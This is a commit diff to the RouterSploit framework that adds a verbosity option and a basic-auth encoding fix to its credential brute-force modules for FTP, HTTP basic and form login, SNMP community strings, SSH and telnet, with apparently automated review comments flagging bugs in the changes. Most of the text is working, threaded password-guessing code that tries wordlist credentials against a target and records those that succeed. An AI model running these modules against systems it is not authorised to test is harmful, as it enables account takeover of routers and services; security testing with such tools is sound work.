Commit 7d5e78cd by Marcin Bury

Adding verbosity level to creds modules. Fixing encoding problem with basic auth.

parent ba3ffc4f
......@@ -11,6 +11,7 @@ from routersploit import (
LockedIterator,
print_success,
print_table,
boolify,
)
......@@ -32,6 +33,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Number of threads')
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -70,9 +72,10 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
ftp = ftplib.FTP()
while running.is_set():
......@@ -89,22 +92,22 @@ class Exploit(exploits.Exploit):
ftp.connect(self.target, port=int(self.port), timeout=10)
break
except socket.error, socket.timeout:
print_error("{} Connection problem. Retrying...".format(name))
print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...")
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
try:
ftp.login(user, password)
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
except:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
ftp.close()
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
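Review bot: The give-up path in `target_function` now passes `verbose=module_verbosity` to the "Too much connection problems. Quiting..." message, so with `verbosity` turned off a worker that never reached the FTP service returns without any output. Assuming `verbose=False` suppresses the print, the run then ends in "Credentials not found", which reads the same as a completed check that found nothing. I would keep the per-attempt lines behind the flag but leave this one unconditional: `print_error("Too much connection problems. Quiting...")`. The same gating is applied in the second FTP module and in both telnet modules further down this commit. Parts of the loop body lie between the hunks and are not shown.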
......@@ -10,6 +10,7 @@ from routersploit import (
LockedIterator,
print_success,
print_table,
boolify,
)
......@@ -30,6 +31,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Numbers of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass pair or file with default credentials (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -62,9 +64,10 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
ftp = ftplib.FTP()
while running.is_set():
......@@ -81,22 +84,22 @@ class Exploit(exploits.Exploit):
ftp.connect(self.target, port=int(self.port), timeout=10)
break
except:
print_error("{} Connection problem. Retrying...".format(name))
print_error("{} Connection problem. Retrying...".format(name), verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...")
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
try:
ftp.login(user, password)
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
except:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
ftp.close()
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
......@@ -11,6 +11,7 @@ from routersploit import (
print_success,
print_table,
sanitize_url,
boolify,
)
......@@ -33,6 +34,7 @@ class Exploit(exploits.Exploit):
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
path = exploits.Option('/', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -75,25 +77,26 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip()
r = requests.get(url, auth=(user, password))
if r.status_code != 401:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
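Review bot: The new `user.encode('utf-8')` and `password.encode('utf-8')` calls raise `UnicodeDecodeError` on Python 2 when the entry is already a byte string with non-ASCII bytes, because `str.encode` first decodes implicitly as ASCII. The surrounding `try` only handles `StopIteration`, so the exception would end the worker thread. Whether `data.next()` yields `str` or `unicode` is not visible in this hunk, so this needs confirming against `LockedIterator` and the wordlist reader. If both can occur, encode only text values: `if isinstance(user, unicode): user = user.encode('utf-8')`, and likewise for `password`. The second basic-auth module carries the same two lines.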
......@@ -10,6 +10,7 @@ from routersploit import (
print_success,
print_table,
sanitize_url,
boolify,
)
......@@ -30,6 +31,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Number of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
path = exploits.Option('/', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -66,25 +68,26 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
user = line[0].encode('utf-8').strip()
password = line[1].encode('utf-8').strip()
r = requests.get(url, auth=(user, password))
if r.status_code != 401:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
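Review bot: The rewritten `line[0]` and `line[1]` lines still depend on `data.next().split(":")`, so an entry without a colon raises `IndexError`, which `except StopIteration` does not catch. A password that itself contains `:` is also cut at the second colon without any warning. Splitting once and checking the separator avoids both: `user, sep, password = data.next().partition(":")` followed by `if not sep: continue`.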
......@@ -12,6 +12,7 @@ from routersploit import (
print_success,
print_table,
sanitize_url,
boolify,
)
......@@ -34,6 +35,7 @@ class Exploit(exploits.Exploit):
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
form = exploits.Option('auto', 'Post Data: auto or in form login={{LOGIN}}&password={{PASS}}&submit')
path = exploits.Option('/login.php', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
data = ""
......@@ -134,11 +136,12 @@ class Exploit(exploits.Exploit):
return '&'.join(res)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -152,11 +155,11 @@ class Exploit(exploits.Exploit):
if l < self.invalid["min"] or l > self.invalid["max"]:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
......@@ -11,6 +11,7 @@ from routersploit import (
print_success,
print_table,
sanitize_url,
boolify,
)
......@@ -32,6 +33,7 @@ class Exploit(exploits.Exploit):
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
form = exploits.Option('auto', 'Post Data: auto or in form login={{LOGIN}}&password={{PASS}}&submit')
path = exploits.Option('/login.php', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
data = ""
......@@ -127,11 +129,12 @@ class Exploit(exploits.Exploit):
return '&'.join(res)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -145,11 +148,11 @@ class Exploit(exploits.Exploit):
if l < self.invalid["min"] or l > self.invalid["max"]:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
else:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
import threading
import netsnmp
from routersploit.utils import print_status, print_success, print_error, print_table, LockedIterator
from routersploit import exploits
from routersploit import wordlists
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
boolify,
)
class Exploit(exploits.Exploit):
......@@ -20,6 +27,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(161, 'Target port')
threads = exploits.Option(8, 'Number of threads')
snmp = exploits.Option(wordlists.snmp, 'Community string or file with community strings (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
strings = []
......@@ -44,10 +52,11 @@ class Exploit(exploits.Exploit):
print_error("Valid community strings not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
address = "{}:{}".format(self.target, self.port)
print_status(name, 'thread is starting...')
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -58,12 +67,12 @@ class Exploit(exploits.Exploit):
if res[0] is not None:
running.clear()
print_success("{}: Valid community string found!".format(name), string)
print_success("{}: Valid community string found!".format(name), string, verbose=module_verbosity)
self.strings.append(tuple([string]))
else:
print_error("{}: Invalid community string.".format(name), string)
print_error("{}: Invalid community string.".format(name), string, verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'thread is terminated.')
print_status(name, 'thread is terminated.', verbose=module_verbosity)
......@@ -31,7 +31,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Number of threads')
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
verbosity = exploits.Option(True, 'Display authentication attempts')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -88,7 +88,7 @@ class Exploit(exploits.Exploit):
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error(name, err, user, password, verbose=module_verbosity)
print_error(name, err, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
else:
running.clear()
......
......@@ -10,6 +10,7 @@ from routersploit import (
LockedIterator,
print_success,
print_table,
boolify,
)
......@@ -32,7 +33,6 @@ class Exploit(exploits.Exploit):
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
verb = None
def run(self):
self.credentials = []
......@@ -54,7 +54,6 @@ class Exploit(exploits.Exploit):
else:
defaults = [self.defaults]
self.verb = self.verbosity.lower()
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
......@@ -66,12 +65,12 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if self.verb == 'yes':
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -84,15 +83,12 @@ class Exploit(exploits.Exploit):
except paramiko.ssh_exception.SSHException as err:
ssh.close()
if self.verb == 'yes':
print_error(name, err, "Username: '{}' Password: '{}'".format(user, password))
print_error(name, err, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
else:
running.clear()
if self.verb == 'yes':
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
if self.verb == 'yes':
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)
......@@ -10,6 +10,7 @@ from routersploit import (
LockedIterator,
print_success,
print_table,
boolify,
)
......@@ -29,6 +30,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Number of threads')
usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -64,9 +66,10 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...')
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -90,21 +93,21 @@ class Exploit(exploits.Exploit):
tn.close()
if i != -1:
print_error(name, "Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
else:
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
tn.close()
break
except EOFError:
print_error(name, "Connection problem. Retrying...")
print_error(name, "Connection problem. Retrying...", verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...")
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
continue
print_status(name, 'thread is terminated.')
print_status(name, 'thread is terminated.', verbose=module_verbosity)
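Review bot: The failed-attempt line `print_error(name, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)` prints the pair without saying what happened to it. The FTP and HTTP modules in this commit prefix the same message with "Authentication Failed - ". Since the line is being touched anyway, I would align it: `print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)`. The telnet defaults module has the same line, and the loop body between the two hunks is not shown.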
......@@ -9,6 +9,7 @@ from routersploit import (
LockedIterator,
print_success,
print_table,
boolify,
)
......@@ -29,6 +30,7 @@ class Exploit(exploits.Exploit):
threads = exploits.Option(8, 'Numbers of threads')
defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
verbosity = exploits.Option('yes', 'Display authentication attempts')
credentials = []
......@@ -59,8 +61,9 @@ class Exploit(exploits.Exploit):
print_error("Credentials not found")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'process is starting...')
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
......@@ -84,21 +87,21 @@ class Exploit(exploits.Exploit):
tn.close()
if i != -1:
print_error(name, "Username: '{}' Password: '{}'".format(user, password))
print_error(name, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
else:
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
self.credentials.append((user, password))
tn.close()
break
except EOFError:
print_error(name, "Connection problem. Retrying...")
print_error(name, "Connection problem. Retrying...", verbose=module_verbosity)
retries += 1
if retries > 2:
print_error("Too much connection problems. Quiting...")
print_error("Too much connection problems. Quiting...", verbose=module_verbosity)
return
continue
print_status(name, 'process is terminated.')
print_status(name, 'process is terminated.', verbose=module_verbosity)